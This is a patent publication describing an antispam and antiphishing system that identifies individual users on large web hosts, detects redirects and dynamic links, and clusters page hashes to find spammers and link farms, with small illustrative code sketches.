WO2007076714A1 - System and method for generalizing an antispam blacklist


Info

Publication number
WO2007076714A1
Authority
WO
WIPO (PCT)
Prior art keywords
user, pages, users, web, agg
Application number
PCT/CN2006/003727
Other languages
French (fr)
Other versions
WO2007076714A8 (en)
Inventor
Marvin Shannon
Wesley Boudeville
Original Assignee
Metaswarm (Hongkong) Ltd.
Application filed by Metaswarm (Hongkong) Ltd. filed Critical Metaswarm (Hongkong) Ltd.
Publication of WO2007076714A1 publication Critical patent/WO2007076714A1/en
Publication of WO2007076714A8 publication Critical patent/WO2007076714A8/en


Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00 Network arrangements or protocols for supporting network services or applications
    • H04L67/01 Protocols
    • H04L67/02 Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F16/00 Information retrieval; Database structures therefor; File system structures therefor
    • G06F16/90 Details of database functions independent of the retrieved data types
    • G06F16/95 Retrieval from the web
    • G06F16/958 Organisation or management of web site content, e.g. publishing, maintaining pages or automatic linking
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L51/00 User-to-user messaging in packet-switching networks, transmitted according to store-and-forward or real-time protocols, e.g. e-mail
    • H04L51/21 Monitoring or handling of messages
    • H04L51/212 Monitoring or handling of messages using filtering or selective blocking
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/02 Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • H04L63/0227 Filtering policies
    • H04L63/0245 Filtering by information in the payload
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1483 Countermeasures against malicious traffic service impersonation, e.g. phishing, pharming or web spoofing
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00 Network arrangements or protocols for supporting network services or applications
    • H04L67/2866 Architectures; Arrangements
    • H04L67/30 Profiles
    • H04L67/306 User profiles

Definitions

  • This invention relates generally to information delivery and management in a computer network. More particularly, the invention relates to techniques for automatically classifying electronic communications as bulk versus non-bulk and categorizing the same.
  • a spammer could try to avoid a blacklist of domains by using a large web hosting site to hold her pages. She sends out spam with links to these pages. An ISP might hesitate to block all messages linking to that prominent site.
  • the Web Service can also offer other information about the user, which can be used by antispam and antiphishing methods.
  • the concept of web pages at a hosting site belonging to a given user can be applied by a search engine to improve its classification and rankings of those pages and pages that they link to, or that link to it.
  • Fig.1 shows a web page host (WH), a central web site (Agg), and a browser. It indicates how WH publishes a mapping f() to the Agg, which then makes it available to a browser, when the browser is visiting WH.
  • base domain So for example, an address like http://ape.bear.com/bin/test0 would give a base domain of bear.com.
  • a domain like mike.joe.tom155.net.au would give a base domain of tom155.net.au. It can be seen that a base domain is a reduction in the number of fields in the domain to some minimal set of fields on the right hand side. Sometimes this is two, as in bear.com; sometimes it is three, as in tom155.net.au.
  • Let D be a domain that we are reducing to a base domain, and let S be a set of known second-level fields for a given country TLD. Assume D ends in the same country TLD that S is associated with. If the second field from the right in D is in S, then the base domain will have 3 fields, and we reduce D accordingly. Otherwise, D hangs directly off the country TLD, so its base domain is 2 fields, and we reduce it to this subset.
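  • As an illustrative sketch only (the contents of S below are assumed for the example, not taken from this Invention), the above reduction could be implemented as:

      # Assumed per-country sets S of second-level fields.
      SECOND_LEVEL = {"au": {"com", "net", "org", "edu", "gov"}}

      def base_domain(domain):
          # Reduce a domain to its minimal set of right-hand fields.
          fields = domain.lower().split(".")
          tld = fields[-1]
          if tld in SECOND_LEVEL and len(fields) >= 3 and fields[-2] in SECOND_LEVEL[tld]:
              return ".".join(fields[-3:])  # mike.joe.tom155.net.au -> tom155.net.au
          return ".".join(fields[-2:])      # ape.bear.com -> bear.com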
  • H the set of major web hosts considered good. The size of H is a key advantage. While there might be a degree of subjectivity in adding a site to H, we can restrict H's size to some relatively small number, probably less than 100. This is crucial, because a typical URL lets the information in its path, which is to the right of the domain, be interpreted in an essentially arbitrary manner by the web server at that domain. Let G be that path in the URL.
  • G a logical and simple example of G might be symbolically written as username + /dir_1/dir_2/.../dir_n/file0, where dir_1, dir_2, ..., dir_n refer to a directory structure written by the customer, in which her file, here shown as file0, exists. (The above could also have arguments to the right of file0.)
  • f() A second way to find f() is for the website to publish it as a Web Service, where the latter is usually described in XML. f() might contain instructions written in a computer language like C or C++, or even in a language like XSLT, so that we could access this Web Service, get f(), and run it easily on our machines.
  • f() returns not just a single string representing the user, but also other data. These include, but are not limited to, the following items (a sketch of such a record follows this list):
  • PAID the user has a paid account.
  • VERIFIED the user has a paid account and the user's identity has been verified by some means.
  • any page with links computes one or more addresses dynamically, instead of using simple static addresses. This applies the idea in "1698", that a spammer could use this to try to avoid detection by a blacklist.
  • links these can be the usual outgoing links, or incoming links (like loading an image).
  • destination we include the case of the destination that is used when an HTML "submit” button (or its functional equivalent in any other hypertext language) is pressed. This action is usually done when the user has typed information into a form on that page, and then wants to upload it.
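  • A minimal sketch of the record such an f() might return; the field names here are assumed for illustration, not specified by this Invention:

      from dataclasses import dataclass

      @dataclass
      class UserRecord:
          username: str             # the single string identifying the user
          status: str               # "FREE", "PAID" or "VERIFIED"
          account_age_days: int     # how long the account has existed
          num_pages: int            # how many pages the user has
          has_dynamic_links: bool   # whether any page computes addresses dynamically
          num_complaints: int       # complaints received about the user's pages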
  • Some of the above information, like the number of pages, could be found by spidering a user's pages. But having the information readily available is more efficient in terms of network traffic and computation, both at the ISP and at the web host, because if the ISP has to do a full spidering of the pages, then this also involves more effort by the web host's server.
  • the ISP can use the above information to help classify the messages pointing to the user's pages.
  • Our methods from the Antispam Provisionals involve the finding of a Bulk Message Envelope (BME). These can objectively find the BMEs with the most messages. There remains the question of whether such a BME, though it has many messages, is to be considered "good" bulk or "bad" bulk. (Good bulk might be newsletters that recipients subscribe to.)
  • the above information can be used as extra "styles" ["1174"] or heuristics to help in this determination. For example, if the user has a verified account, then the messages linking to her pages might be more likely to be good bulk than bad, compared to a user just having a paid or free account, other factors being equal.
  • Let WH be a web host, with website wh.com. Why should it provide the above information? If it is serious about not tolerating spam, then it might be amenable.
  • the above lets message providers give it feedback with assessments of its users. For example, if an ISP made a decision that a given user at WH is a spammer, it might communicate this to WH. To optimize bandwidth, the ISP might batch these results. Then it could periodically upload to WH a list of WH's users, as seen in the ISP's incoming messages. Next to each username could be information like the total number of messages seen with links to that user, and the number of these messages that the ISP considered to be spam. Implicitly, if there is a difference between these two numbers, then those other messages were not considered to be spam.
  • WH telling the ISP about the complaints it has received about Zoltan's pages could be an infringement of Zoltan's privacy. But the complaints might be regarded as negative votes on those pages, akin to Amazon Corp.'s website, where you can read a review of a book, and see how many positive or negative votes that review got. The comparison is especially appropriate since the reviews are on publicly accessible pages, and typically so too are most of the pages at WH. Plus, WH could in general modify its Terms of Service with its users, to expressly permit the above furnishing of information to third parties like ISPs.
  • WH might also offer on its web pages, or via a Web Service, a means of searching its users, using constraints on the above variables as search criteria. For example, it could return links to those users whose free or paid accounts have existed for more than 60 days.
  • a merit of our method is that it attacks a technique by a spammer who opens an account at WH and writes pages, and who then injects spam into the network by various means, whose only connection to WH are in the enclosed links.
  • the spammer takes advantage of the fact that WH and the ISP currently each only sees its own situation.
  • WH could have a Web Service that tells whether a user has a free, paid or verified account. Instead, or in addition, WH could also encode this in the URLs of a user's pages. So if Zoltan has a free account, his base URL might be http://wh.com/free/Zoltan, while if Mary has a paid account, her base URL might be http://wh.com/paid/Mary. In doing this, it could reduce the bandwidth requirements on WH's Web Service, since the latter now need not furnish such information. But another advantage of this is that it is analogous to our Notphish tag in "2528", if several web hosts use an agreed upon encoding, whose meaning can in turn be used at ISPs.
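  • A sketch of how a message provider might read the status from such a URL, assuming the http://wh.com/<status>/<username> convention above:

      from urllib.parse import urlparse

      STATUSES = {"free", "paid", "verified"}

      def user_status(url):
          # Returns (status, username) if the URL follows the convention, else None.
          parts = urlparse(url).path.strip("/").split("/")
          if len(parts) >= 2 and parts[0] in STATUSES:
              return parts[0], parts[1]
          return None

      # user_status("http://wh.com/paid/Mary/shop/index.html") -> ("paid", "Mary")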
  • Zoltan is a spammer, with his base URL given above. He cannot change this URL, even if he would prefer a "paid" or "verified" in it, because in general there will be no pages at that URL if he does so, which means no clickthrough is possible from that link in his messages. Or even if, by coincidence, there is a http://wh.com/paid/Zoltan, it goes to a different person's pages, and not to whatever "our" Zoltan is selling.
  • WH Whether or not WH writes user information into the URLs, it can also publish a set of what we term "base labels". These labels mean that if a URL has a path that begins with one of these base labels, then it refers to a page published directly by WH itself, as opposed to its users. Imagine for example that the base labels are {info, home, help}. These demarcate directories of pages that are not written by the users. The base labels might be published as a Web Service and in a web page. It lets third parties programmatically distinguish between WH and its users.
  • the presence of labels for a user's status in the URL also lets these be used in antispam measures that operate on messages containing the URLs.
  • the measures might be performed at the message provider that receives the messages, or in the recipient's computer, as a client side filtering of spam.
  • the user status in the URL can be used as an extra heuristic in assessing the message containing the URL.
  • the recipient might even have a policy that such a message, pointing to a good web hosting site, goes into her bulk folder if it is from a free user, while if it is from a paid or verified user, it goes into her inbox.
  • both cases might be overridden by other filtering steps, like if the sender is in her whitelist, then the message goes into her inbox, even if it points to a free user's URL. Or if the message also has a link with a domain in a blacklist, then the message might go into the bulk folder, even if another link points to a verified user's URL at WH.
  • the interplay between the filtering rules might be complex. But the point is that knowledge of the user status gives us another handle on fighting spam.
  • the antispam steps in the previous paragraph might also be possible even if WH does not write the status of the user into the URL. If WH does publish a Web Service with this information, then a message provider can ask it for that information, and do the other steps suggested in the paragraph. This might also be possible at the recipient's computer, if her mail reading software accesses WH's Web Service.
  • styles can be defined if the page has a redirect (a detection sketch follows this list of mechanisms).
  • the redirect might be done via a META refresh tag.
  • server side actions like a CGI script or Java that runs on the server.
  • the ISP or other external party could load the page and detect the META refresh tag or JavaScript that would run in a browser.
  • server side actions the ISP might choose to simulate a browser, to find the destination that the actions redirect to.
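  • For the first mechanism above, the META refresh tag, detection might look like this sketch; the regular expression is illustrative, not exhaustive:

      import re

      META_REFRESH = re.compile(
          r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*'
          r'content=["\']?\s*\d+\s*;\s*url=([^"\'>]+)', re.IGNORECASE)

      def meta_refresh_target(html):
          # Returns the declared redirect destination, or None if there is none.
          m = META_REFRESH.search(html)
          return m.group(1).strip() if m else None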
  • Some web hosting sites might prevent their users from using some of the above mechanisms. For example, WH might restrict its users to writing HTML.
  • Since redirect mechanisms might vary, and new ones might emerge over time, the intent here is to detect a redirection, and not how that is achieved. The detection is not expected to be difficult, though below we discuss how the destination might possibly be obscured.
  • a redirect is important because unlike clicking on a link, it does not involve the browser user's active intervention. This is sometimes used by a spammer, to take the visitor away from the URL that ends at WH, to the spammer's actual website. Or perhaps to another website with another redirect et cetera; ultimately ending up at the true spammer's website.
  • the presence of a redirect in any of a user's pages could set a Boolean style. Or the style might be an integer that counts up the number of the user's pages that have redirects. Or it could be a fraction that normalizes this number with respect to the total number of user's pages. An important special case of the latter is where there is only one page for the user, and it redirects. This might be considered a special and potentially suspicious style.
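  • The redirect styles just described might be computed as in this sketch (the style names are assumed):

      def redirect_styles(pages_with_redirect, total_pages):
          return {
              "has_redirect": pages_with_redirect > 0,                 # Boolean style
              "redirect_count": pages_with_redirect,                   # integer style
              "redirect_fraction": pages_with_redirect / total_pages,  # normalized style
              # special, potentially suspicious case: the user's only page redirects
              "single_page_redirect": total_pages == 1 and pages_with_redirect == 1,
          }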
  • Suppose a redirect stays within wh.com. If it goes to a different user, then this might set a Boolean style, as contrasted with a redirect that stays within the user's files. Why might this be significant? There are at least two possible reasons. Firstly, the spammer might set up a main account, that has various pages (and perhaps code as well) selling some item. Then, she might set up other accounts, which redirect to the main account. The URLs of the former accounts are promulgated in spam. So if these are blacklisted, her main account might not be. The blacklisting might involve either a simple use of the domain+path, or a resolving down to the base domain + user name, as described in Section 6. And there is less effort for her compared to setting up the full pages on all her accounts.
  • the anchor text (“Cheap Meds”) is visible when the recipient views the spam in a program like a browser that can show HTML. Now when she moves her mouse over the link, the bottom of the browser will show the URL. But some users ignore this. If she clicks on the link, it takes her to that URL. An immediate redirect happens, to http://wh.com/paid/Nick. This URL appears in the address bar at the top of the browser, and is far more prominent than a link transiently displayed at the bottom. So the recipient sees a page in a paid account.
  • a Boolean style could be set. Or an integer style that counts the number of such destinations in the chain.
  • the styles could also be associated with the destination domains. Giving extra information to help classify those domains.
  • redirect styles There might be other redirect styles specific to a site. Like, does the site let a user write a redirect? If so, can she redirect outside the site? If so, does the site filter these redirects against a blacklist? So that an attempt by a user to write a page with such a redirect is rejected, and the page never appears on the Web. Does the site also filter redirects against a whitelist?
  • the site can use the ideas in "1698" to run master-slave threads that call the routine, in order to find the address.
  • the slave does the computation, but the master will terminate the slave if it does not end within some given time.
  • This avoids the possibility that a spammer submits a page with a routine that deliberately takes a long (or infinite) time. She is trying to stop the site from scrutinizing the dynamic addressing. So that even though that particular account of hers might be deleted because of this, the long run time endured by the site to find this out is meant to deter the site from doing this as a general practice, letting her make another account with dynamic addressing. Our method in "1698" avoids this trap.
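  • A minimal sketch of this master-slave timeout, in the spirit of "1698"; the timeout value is arbitrary:

      import multiprocessing as mp

      def _slave(routine, args, out_q):
          out_q.put(routine(*args))  # the slave does the computation

      def resolve_dynamic_address(routine, args=(), timeout_s=5):
          out_q = mp.Queue()
          worker = mp.Process(target=_slave, args=(routine, args, out_q))
          worker.start()
          worker.join(timeout_s)
          if worker.is_alive():   # routine ran too long: assume a deliberate stall
              worker.terminate()
              worker.join()
              return None         # flag as suspicious rather than hang the site
          return out_q.get() if not out_q.empty() else None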
  • An external entity like an ISP, or even a browser can also apply this anti-dynamic addressing method against a redirect, if the routine exists in code that is downloaded to a browser.
  • These styles or policies can also be used as additional criteria for determining if a given web hosting site will be admitted to the set of good sites, H, or kept in it.
  • wh.com is not put into a blacklist. But we might instead put wh.com/Zoltan into the blacklist.
  • templating occurs when we reduce a message to its canonical form and make hashes, and find that it is an instance of an existing BME, but the current message has a base domain from a link that is not in the BME's list of domains. We call it templating because the spammer is using a base version of the message as a template, and inserting different domains into the links. Now, we can also look to see if the spammer is using different user accounts at a given web host, or maybe different accounts at different web hosts, based on messages received by us. Plus, we can also spider the various links, and apply our canonical steps to the web pages pointed to, out to some n-ball in link space.
  • Agg Aggregation Center
  • the Agg can also be used in this Invention. Earlier, we described how an ISP could decide the composition of a list, H, of major web hosts. It would then obtain f() from each web host. An alternative is for the Agg to do these tasks, and then furnish this to its customer ISPs. (Or, an antispam vendor might furnish the equivalent software and data to ISPs.)
  • the Agg is well suited to maintain H and its associated information. For example, complaints by ISPs about users in a given company in H might be amassed by the Agg and then forwarded to that company. This could be useful from the company's vantage. Because instead of dealing with many ISPs, and perhaps wondering if some might have been subverted and are then sending it spurious complaints, it delegates to the Agg the problem of filtering the complaints.
  • the maintenance could include deciding what web hosts will be in H, and whether to keep a given host in H. For the latter host, suppose it is WH. The situation might arise if WH takes too long to respond to complaints from the Agg about its users. What "too long" means might be defined by the Agg. So that a web host which is put into H might agree to respond within this time, as part of the condition for it to belong in H. It should be appreciated that there is value for WH to be in a widely used H.
  • the Agg might compute various metrics about each host in H. Like the number of complaints it gets from its ISPs about each host's users. Or the number of each host's users that are complained about. Or the average time between the Agg complaining to a host about one of its users and that user being taken offline. Also, if a host furnishes status information about its users, like whether they are free, paid or verified, then the Agg can total up complaints for users in each category. So that, for example, if WH has many verified users that are complained about, it suggests that WH's verification methods might need improvement.
  • the Agg can act as a known, trusted intermediary, standing between the web hosts of H and ISPs and other message providers.
  • H is expected to be of small size. In part, because if each ISP has to maintain its own, a small H is less effort. However, if Agg maintains H, then it may be cost effective for it to have a larger H, since it can essentially amortize this effort over a base of many ISPs.
  • the Agg can offer a service to the web hosts in H. It can certify that a given web host is in H. So that the Agg is attesting that members of H perhaps follow certain good practices, where these might be defined by the Agg, as a prerequisite for membership (and continued membership) in H. So it might offer WH an image that WH could show on some of its pages, where this image is a "seal" attesting to validation by the Agg.
  • the seal might also be clickable, going to Agg's website, where data is then shown about WH's qualifications. However, while this could be done, it is well known that seals have disadvantages. They can be copied by spammers. And if a real seal is clickable, so too might the fake seal.
  • the fake either goes to another spam page, or even to the Agg's website. In either case, the spammer hopes that most users will not bother to click the fake seal.
  • the Agg can offer a stronger measure.
  • the extension could validate that a given web site which the browser is visiting is actually in H. Plus, if it finds links to the validation pages at Agg, at pages not in H, then the browser could indicate this to its user, perhaps by a visual cue that says the page is a fake.
  • the Agg can also offer a service to users at web hosts. By various means, it might offer some validation of a user's identity or reputation, possibly in conjunction with a validation of the user's web pages.
  • Consider Jane at WH, with her web pages beginning with http://wh.com/jane/. In those pages, Jane could have a tag that points to the Agg, so that a visitor can ask the Agg what it vouches about her. Plus, in her URLs, there might be the equivalent information, encoded in some fashion.
  • WH controls the format of URLs pointing to its pages, and it could permit this encoding. Hence, even if WH were not to offer the information about Jane described in Section 3, this encoding would let her offer others some assurance about her and her web pages.
  • the unvalid state is the default, for a user that has not been validated, and who does not have "bad" pages which might cause her to be invalid, in the Agg's assessment.
  • the validation of a user need not be confined to users with pages in H.
  • the Agg might refuse to validate any users on a website, if that site fails to meet standards imposed by the Agg. This acts against a minor web hosting site being conducive to spammers, where a spammer might deliberately set up several "users" with benign pages, and get these validated by the Agg, to try to enhance the overall reputation of the site, and then proceed to issue spam linking to other users at the site.
  • when validating one user's pages, the Agg might offer the user a validation seal to put in her pages. This might (or perhaps should) be clickable, leading to the Agg, whereupon there might be an Agg page with information about the user. Plus, if the browser has the above extension, then it might validate the user's pages in a manner that is external to the pages.
  • Agg For both a website and a user, there could be different levels of validation offered by the Agg. There might be a strictly algorithmic validation. Then there could be a higher level of validation, which performs the previous validation and also involves some manual steps on the part of the Agg's employees and possibly also of the website's employees or of the user. The Agg could impose a higher fee for the latter validation, compared to the former.
  • a user might have accounts on several hosting sites, and the Agg could offer to validate these, all under the rubric of the same user.
  • the Agg could have some steps to verify that the same person controls these accounts.
  • the Agg validating a user or website might be useful to either. For example, a validated user might be able to obtain a higher commission for clickable ads that are placed in her pages, perhaps on the presumption that her pages are more likely to be credible. Or messages linking to her pages might be less likely to be treated as spam by various antispam methods that can identify that she is validated.
  • If the Agg were to invalidate a user or website, then this might be for two reasons. One is if the certification is paid for by the user or website, and the period for which this is valid has expired, and no payment has been received for another period. Another reason could be that through its analysis of the pages, or from external input, the Agg finds that the user or website should not be validated. The first reason might be considered more benign than the second.
  • the Agg might inform her website(s).
  • the Agg might search its data for other users with pages canonically identical to the now invalid pages, and possibly invalidate those users, and inform their websites. Plus, the Agg might inform various ISPs and message providers that are its customers, updating their blacklists with this new entry for the invalid user.
  • the Agg validates a user that was earlier invalid, then it might inform its ISP customers, suggesting that they remove the user from their blacklists.
  • a search engine could also benefit from the extra information made available by a web hosting site.
  • the engine can access the information from the Web Service of WH. Then for a given web page, the engine knows if the author is a free, paid or verified customer of WH. And possibly the number of complaints made against the page. And how long the account has existed.
  • Each engine has its own methods of ranking pages. This new information might be used to refine the rankings. For example, a page by a paid user might have a slightly higher weighting than a page by a free user, other factors being equal. Or, if WH used labels in its URLs, as suggested above, then the engine could use these.
  • Zoltan has a hierarchy of pages, in various directories and subdirectories of the above URL.
  • the engine spiders these pages and wants to compute weightings.
  • Suppose a particular directory, cheapPills/, and its pages are linked to by various pages outside wh.com.
  • the engine might in turn look at the links to those pages and by various computations, use the data to derive a weight for that directory or its pages.
  • this might be what the engine normally does.
  • the engine can also take this to a higher level. Across the users at WH, and across users at other websites, the engine can also search for similarities between users with a same interest. Possibly the engine is already doing this, but only by comparing between pages, or between domains. Our method gives an intermediate level of grouping of pages that may prove to be useful.
  • This "Search Engine Optimization” might involve techniques disapproved of by the engine. Especially if Zoltan is part of a link farm that tries to boost the rankings of pages that it heavily links to. Search engines already have various means of trying to find link farms. In this Invention, by applying the concept of a user and the pages owned by the user, at a web hosting site, we offer another means of finding a farm.
  • Zoltan has a directory, gamble/, linked to from spam. But now his other directory, cheapPills/, has links to directories at other websites. It is functioning as a source of links, within a link farm.
  • the search engine finds out, as above, about the spam links to gamble/. Then, because it has the knowledge of Zoltan as a user, it could use this as a heuristic to be applied against the weightings of cheapPills/ and its files, as a possible member of a link farm. Plus, by following the outgoing links from cheapPills, it can try to trace out other members of the link farm.
  • a link farm that is distributed across several websites, can be considered to be a group of (undesirable) users. To the extent that a link farm has members on a web hosting site, the above showed how it can be searched for, using another ECM space of electronic messaging. In addition, the space of users browsing on the web can also be used.
  • Phi removes all personally identifying aspects in the data. Phi is interested in the aggregate nature of the data, which correlates websites in a manner that might not be discernible from a static view of pages and links.
  • Phi is looking for a mapping f( ⁇ set of URLs ⁇ ) --> spammer, where the latter can be considered to be one bad "user". This might not necessarily be a link farm.
  • An initial group of associated URLs can be investigated using our BME method of "0046".
  • the URLs and pages linked to or from these, or some pages in the same domain as those URLs, might be reduced to BMEs. Then these are compared to see if any are the same or similar across different domains. The sameness or similarity could arise if the same person or group of persons is behind those addresses, and is using boilerplate phrasing on some pages.
  • the URL is to a web hosting site, then the methods of this Invention can be applied to those pages at the site that are from the same user.
  • the engine can act, if it finds out that some of Zoltan's pages are spam. By doing a canonical reduction of most or all of Zoltan's pages, the engine can see if the non-spam pages are canonically the same as (or similar to) pages at other domains. This uses the global scope of the engine's spidering, and assumes that when it records the spidered pages, it does the canonical reduction, in part to permit such a comparison with new pages. More generally, suppose some of Zoltan's pages are found to be "bad", by any means. (Perhaps they are pointed to by spam, as discussed earlier.) Then the method of the previous paragraph can be applied to the pages. While it is clear why the engine should look for similar bad pages, looking for similar good pages may also reveal associations between domains and pages. These actions force Zoltan to expend more effort at customizing his pages on different websites, or risk them being detected and blacklisted. Increasing the spammer's effort is desirable to both an ISP and a search engine.
  • the 5 on the edge means that there are at least 5 BMEs containing both domains.
  • the cluster was made from an underlying space of users, then the above could be defined as meaning that 5 users have both domains.
  • “have” could mean that we take a user at WH, find its pages and extract domains from links in them.
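  • A sketch of building such weighted edges, where a user "has" a domain as defined above (the data shapes are assumed):

      from collections import Counter
      from itertools import combinations

      def domain_edges(user_to_domains):
          # Edge weight = the number of users having both domains,
          # like the 5 on the edge in the example above.
          edges = Counter()
          for domains in user_to_domains.values():
              for a, b in combinations(sorted(set(domains)), 2):
                  edges[(a, b)] += 1
          return edges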
  • An extension of this method involves possibly determining if there appear to be groupings in the user's pages, based on an analysis of the user's URLs. Does the URL notation suggest a division into directories and subdirectories? It does not have to. But recall that WH is considered to be a major web host. So it is likely to use a simple URL notation, for the benefit of its users. Given this, for a cluster of a user's pages to have two connected domains might involve parameters that indicate the separation between two pages, each with one of those domains, in the user's directory structure. Where the domains might be connected if the pages are separated by less than some metric that measures the "distance" between 2 files in a directory tree. This can also aid in the autoclassification of the directories.
  • the entity (which could be the Agg) making the clusters has access to data from other web hosting sites, then the users that produce the above might be from different sites. Plus, the entity might also add user message data, where these users are recipients or senders of electronic messages, and where the messages might have clickable links, from which domains can be found.
  • finding clusters through the mixing of data from these ECMs, we improve our chances of finding associations, especially those that might be indicative of spam.
  • the entity does not need to have access to the full text of the electronic messages. (So it does not have to be an ISP or message provider.)
  • a key finding in "0046" was that canonically reduced BME data could be exported from a message provider to another organization, without letting the latter have access to the original messages.
  • the clusters are found using the BME data.
  • clusters might be made that do not take all the users in WH. Instead, just the free users, or just the paid users, or just the verified users might be taken as the input to finding clusters. Or we might make clusters from user accounts that have existed for less than 30 days. Likewise, we can do these steps across different web hosting sites. So we can investigate if there are any distinctive differences between these groups of users. Perhaps free users are more likely to be spammers on some web hosts?
  • clusters to be found from users confined to one web host. Then these are compared to those clusters found from other web hosts.
  • user data from message providers might or might not also be used, when finding clusters.
  • each hash is represented as a hexadecimal string.
  • the 7 means that there are 7 users, each with both hashes. When we say a user has both hashes, this could be taken to mean that the user's pages have been canonically reduced ["0046"], and a set of hashes made for each page.
  • the hashes might be required to be from the same page. Or, more generally, from different pages of the same user.
  • the users might be from one web hosting site, or from several. And data might optionally be introduced from messages sent or received by message providers. Also, hash clusters might be made with users restricted to the free, paid or verified categories.
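  • An illustrative sketch of producing such hexadecimal page hashes; the actual canonical steps of "0046" are not reproduced here, so the reduction below is only a stand-in:

      import hashlib
      import re

      def canonical(text):
          text = re.sub(r"<[^>]+>", " ", text)  # stand-in canonical step: drop markup
          return re.sub(r"\s+", " ", text).strip().lower()

      def page_hash(text):
          # Each hash is represented as a hexadecimal string, as described above.
          return hashlib.sha256(canonical(text).encode()).hexdigest()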
  • Incoming links could also be used.
  • HTML these might be when a page is loading an image from a URL that points to another user's page or asset.
  • information in redirects might also be used, if these go from one user to another. This method looks for explicit connections and can help show users that are prominent sources (many outgoing edges) or sinks (many incoming edges). Hence, these might be put under further scrutiny.
  • Another method is to derive user clusters from an underlying space of BMEs. We might find two nodes connected like this -
  • the 8 means that there are 8 BMEs present in both Janet's and Zoltan's sets of BMEs, where these sets are derived by canonical reduction of their web pages. Clicking on the 8 brings up a list of the common BMEs, from which the investigator can find more details.
  • if WH makes available the extra data about the users that was discussed in Section 3, then more analysis options emerge. For example, the building of user clusters might also include some graphical display of when the user accounts were made. Or the users might be restricted to those made in some time interval. This searches for temporal correlations, since if a spammer makes several accounts, she is likely to do so over a short time interval. If she increases this interval, then it takes longer for her to set up to issue spam pointing to these users. We look for characteristics that are inherently hard for her to obscure.
  • Another example could be the making of clusters from users with less than some number of pages. And then comparing these clusters to those from users with pages greater than or equal to that number.
  • BMEs made from electronic messages.
  • the user information might be about the case where the user is the recipient or where the user is the sender, where, in general, these are different from the users who have pages at the hosting sites.
  • by user cluster we mean the latter users.
  • message A has a link to an URL of a file owned by Janet
  • message B has a link to an URL of a file owned by Zoltan.
  • both messages produce the same BME.
  • links are removed from the message, before hashing is done.
  • the second approach complements the first. It can be used to find associations between users that have no explicit connection between them.
  • domain and user clusters Given the making of domain and user clusters, these can be used if the Agg finds a user to be invalid. Then, the domains or other users that it links to in the clusters can be scrutinized, to see if these might be invalid. Care has to be taken, because the spammer might deliberately put in links to innocent sites, as a countermeasure. Also, the Agg can look at domains and users that link to the invalidated user. This may be more suspect than outgoing links from the latter. The countermeasure done by the spammer for outgoing links could typically be to well known websites. But for incoming links, who knows about that account? Often, it would be an obscure account.
  • style clusters can also be made, along the lines of "1745".
  • style information could (and probably should) be used in several of the above suggested analyses. For example, when making a user cluster, the styles of users within the same cluster could be compared. Styles that occur frequently amongst many users in a cluster might be used to characterize the entire cluster. Or, styles that occur only in a subset of the cluster might suggest a natural subdivision of the cluster. Also, if styles are found for entire clusters, then this gives a means of comparing clusters, and a basis for classifying clusters.
  • phishing needs a faster response.
  • the Agg might contact WH, as soon as the Agg has verified that indeed a browser has detected a phishing message with a link to, say, http://wh.com/free/Zoltan.
  • WH could do several things. It might immediately shut down Zoltan's pages, to prevent anyone else from being defrauded after this time. Or it might discard any requests for that page, and Zoltan's other pages (if any), but let investigators get the pages. This protects unwary visitors, while possibly letting investigators submit fake personal data that could be used to entrap the phisher. If the pages have outgoing links, these could be followed to see if they lead to the phisher.
  • WH could use our antispam methods of making a BME to see if any pages by its other users are canonically the same or similar to Zoltan's pages. This handles the case where Zoltan has opened several accounts at WH, and is also using those as destinations for phishing.
  • the Agg might make BMEs out of Zoltan's pages, and then see if these are present at other websites in H. It might send these BMEs to those sites, and ask them to check these against their users' pages. Or for some sites, the Agg might do this task.
  • WH might wait some period of time, before making the page publicly available. During this, it could subject the page to various antispam and antiphishing analyses.
  • the Agg would function in an antispam or antiphishing capacity. For example, it might use our Antispam and Antiphishing Provisionals. Especially by making BMEs of the submitted pages, and comparing these to other known BMEs. Here, in an extension of the way we made BMEs in "0046", these BMEs would also include in some manner the URLs that pointed to the pages that went into those BMEs.
  • the Agg is well suited to do this analysis, since it could receive submitted pages from a variety of web hosts. Plus, it would have the expertise to develop and run specialized testing, that even a major web host might not have.
  • WH would expressly permit it to access those pages, while denying general access from the rest of the network.
